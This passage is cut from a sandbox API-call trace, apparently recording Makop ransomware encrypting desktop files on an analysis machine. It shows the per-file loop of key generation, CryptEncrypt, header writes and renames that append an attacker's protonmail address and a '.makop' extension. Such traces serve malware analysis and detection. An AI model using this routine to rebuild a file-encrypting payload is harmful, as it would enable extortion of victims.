lpNumberOfBytesWritten=0x245fc90*=0xa9c0, lpOverlapped=0x0) returned 1 [0128.069] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.069] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0xaa94, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.069] SetEndOfFile (hFile=0xac) returned 1 [0128.074] GetProcessHeap () returned 0x550000 [0128.074] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0128.074] GetProcessHeap () returned 0x550000 [0128.074] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0128.074] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\i7z5HWiZn8rb.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i7z5hwizn8rb.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\i7z5HWiZn8rb.bmp.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i7z5hwizn8rb.bmp.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0128.113] CloseHandle (hObject=0xac) returned 1 [0128.114] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x876ac610, ftCreationTime.dwHighDateTime=0x1d5ddd2, ftLastAccessTime.dwLowDateTime=0x1c807870, ftLastAccessTime.dwHighDateTime=0x1d5d85c, ftLastWriteTime.dwLowDateTime=0x1c807870, ftLastWriteTime.dwHighDateTime=0x1d5d85c, nFileSizeHigh=0x0, nFileSizeLow=0x1770b, dwReserved0=0x0, dwReserved1=0xffff, cFileName="KX4l0.odp", cAlternateFileName="")) returned 1 [0128.114] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KX4l0.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kx4l0.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0128.114] GetProcessHeap () returned 0x550000 [0128.114] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0128.114] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0128.114] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0128.115] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0x5, lpOverlapped=0x0) returned 1 [0128.116] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.116] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.116] GetProcessHeap () returned 0x550000 [0128.116] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x30) returned 0x56cb70 [0128.116] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56cb70*, pdwDataLen=0x245fc78*=0x30, dwBufLen=0x30 | out: pbData=0x56cb70*, pdwDataLen=0x245fc78*=0x30) returned 1 [0128.116] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.116] WriteFile (in: hFile=0xac, lpBuffer=0x56cb70*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56cb70*, lpNumberOfBytesWritten=0x245fc90*=0x30, lpOverlapped=0x0) returned 1 [0128.116] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0128.116] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0128.116] WriteFile (in: hFile=0xac, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0128.116] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0128.116] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0128.116] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.116] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.116] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.117] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x1770b, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x1770b, lpOverlapped=0x0) returned 1 [0128.117] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x17710, dwBufLen=0x17710 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x17710) returned 1 [0128.119] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.119] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x17710, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x17710, lpOverlapped=0x0) returned 1 [0128.119] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.119] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x177d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.119] SetEndOfFile (hFile=0xac) returned 1 [0128.124] GetProcessHeap () returned 0x550000 [0128.124] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0128.124] GetProcessHeap () returned 0x550000 [0128.124] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0128.124] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KX4l0.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kx4l0.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KX4l0.odp.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kx4l0.odp.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0128.135] CloseHandle (hObject=0xac) returned 1 [0128.135] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dd81ea0, ftCreationTime.dwHighDateTime=0x1d5d7ab, ftLastAccessTime.dwLowDateTime=0xa93a6450, ftLastAccessTime.dwHighDateTime=0x1d5ddd0, ftLastWriteTime.dwLowDateTime=0xa93a6450, ftLastWriteTime.dwHighDateTime=0x1d5ddd0, nFileSizeHigh=0x0, nFileSizeLow=0x11cdf, dwReserved0=0x0, dwReserved1=0xffff, cFileName="kxF332T.wav", cAlternateFileName="")) returned 1 [0128.135] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kxF332T.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kxf332t.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0128.135] GetProcessHeap () returned 0x550000 [0128.135] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0128.135] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0128.135] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0128.135] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0x1, lpOverlapped=0x0) returned 1 [0128.137] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.137] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.137] GetProcessHeap () returned 0x550000 [0128.137] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d90 [0128.137] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40, dwBufLen=0x40 | out: pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40) returned 1 [0128.137] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.137] WriteFile (in: hFile=0xac, lpBuffer=0x566d90*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566d90*, lpNumberOfBytesWritten=0x245fc90*=0x40, lpOverlapped=0x0) returned 1 [0128.137] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0128.137] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0128.137] WriteFile (in: hFile=0xac, lpBuffer=0x56c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56c928*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0128.137] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0128.137] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0128.138] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.138] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.138] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.138] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x11cdf, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x11cdf, lpOverlapped=0x0) returned 1 [0128.138] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x11ce0, dwBufLen=0x11ce0 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x11ce0) returned 1 [0128.139] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.139] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x11ce0, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x11ce0, lpOverlapped=0x0) returned 1 [0128.140] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.140] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x11db4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.140] SetEndOfFile (hFile=0xac) returned 1 [0128.145] GetProcessHeap () returned 0x550000 [0128.145] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0128.145] GetProcessHeap () returned 0x550000 [0128.145] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0128.145] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kxF332T.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kxf332t.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kxF332T.wav.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kxf332t.wav.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0128.216] CloseHandle (hObject=0xac) returned 1 [0128.216] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6729d9e0, ftCreationTime.dwHighDateTime=0x1d5dc2e, ftLastAccessTime.dwLowDateTime=0x90840cd0, ftLastAccessTime.dwHighDateTime=0x1d5e3d5, ftLastWriteTime.dwLowDateTime=0x90840cd0, ftLastWriteTime.dwHighDateTime=0x1d5e3d5, nFileSizeHigh=0x0, nFileSizeLow=0x1278f, dwReserved0=0x0, dwReserved1=0xffff, cFileName="lcS 9b3MYSAiTy.mp4", cAlternateFileName="LCS9B3~1.MP4")) returned 1 [0128.216] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lcS 9b3MYSAiTy.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lcs 9b3mysaity.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0128.216] GetProcessHeap () returned 0x550000 [0128.216] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0128.216] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0128.216] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0128.216] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0x1, lpOverlapped=0x0) returned 1 [0128.218] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.218] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.218] GetProcessHeap () returned 0x550000 [0128.218] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d90 [0128.218] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40, dwBufLen=0x40 | out: pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40) returned 1 [0128.218] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.218] WriteFile (in: hFile=0xac, lpBuffer=0x566d90*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566d90*, lpNumberOfBytesWritten=0x245fc90*=0x40, lpOverlapped=0x0) returned 1 [0128.218] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0128.218] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0128.218] WriteFile (in: hFile=0xac, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0128.218] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0128.218] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0128.219] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.219] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.219] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.219] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x1278f, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x1278f, lpOverlapped=0x0) returned 1 [0128.220] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x12790, dwBufLen=0x12790 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x12790) returned 1 [0128.220] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.221] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x12790, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x12790, lpOverlapped=0x0) returned 1 [0128.221] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.221] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x12864, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.221] SetEndOfFile (hFile=0xac) returned 1 [0128.231] GetProcessHeap () returned 0x550000 [0128.231] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0128.231] GetProcessHeap () returned 0x550000 [0128.231] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0128.231] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lcS 9b3MYSAiTy.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lcs 9b3mysaity.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lcS 9b3MYSAiTy.mp4.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lcs 9b3mysaity.mp4.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0128.241] CloseHandle (hObject=0xac) returned 1 [0128.241] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc8620e0, ftCreationTime.dwHighDateTime=0x1d5d839, ftLastAccessTime.dwLowDateTime=0x3c5cfcb0, ftLastAccessTime.dwHighDateTime=0x1d5dca1, ftLastWriteTime.dwLowDateTime=0x3c5cfcb0, ftLastWriteTime.dwHighDateTime=0x1d5dca1, nFileSizeHigh=0x0, nFileSizeLow=0xac0a, dwReserved0=0x0, dwReserved1=0xffff, cFileName="lff-B.odp", cAlternateFileName="")) returned 1 [0128.241] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lff-B.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lff-b.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0128.241] GetProcessHeap () returned 0x550000 [0128.241] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0128.241] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0128.242] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0128.242] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0x6, lpOverlapped=0x0) returned 1 [0128.264] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.264] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.265] GetProcessHeap () returned 0x550000 [0128.265] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x30) returned 0x56cb70 [0128.265] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56cb70*, pdwDataLen=0x245fc78*=0x30, dwBufLen=0x30 | out: pbData=0x56cb70*, pdwDataLen=0x245fc78*=0x30) returned 1 [0128.265] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.265] WriteFile (in: hFile=0xac, lpBuffer=0x56cb70*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56cb70*, lpNumberOfBytesWritten=0x245fc90*=0x30, lpOverlapped=0x0) returned 1 [0128.265] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0128.265] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0128.265] WriteFile (in: hFile=0xac, lpBuffer=0x56c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56c928*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0128.265] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0128.265] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0128.265] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.265] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.266] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.266] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0xac0a, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0xac0a, lpOverlapped=0x0) returned 1 [0128.277] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0xac10, dwBufLen=0xac10 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0xac10) returned 1 [0128.278] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.278] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0xac10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0xac10, lpOverlapped=0x0) returned 1 [0128.278] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.278] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0xacd4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.278] SetEndOfFile (hFile=0xac) returned 1 [0128.282] GetProcessHeap () returned 0x550000 [0128.283] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0128.283] GetProcessHeap () returned 0x550000 [0128.283] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0128.283] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lff-B.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lff-b.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lff-B.odp.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lff-b.odp.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0128.292] CloseHandle (hObject=0xac) returned 1 [0128.293] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49947aa0, ftCreationTime.dwHighDateTime=0x1d5d956, 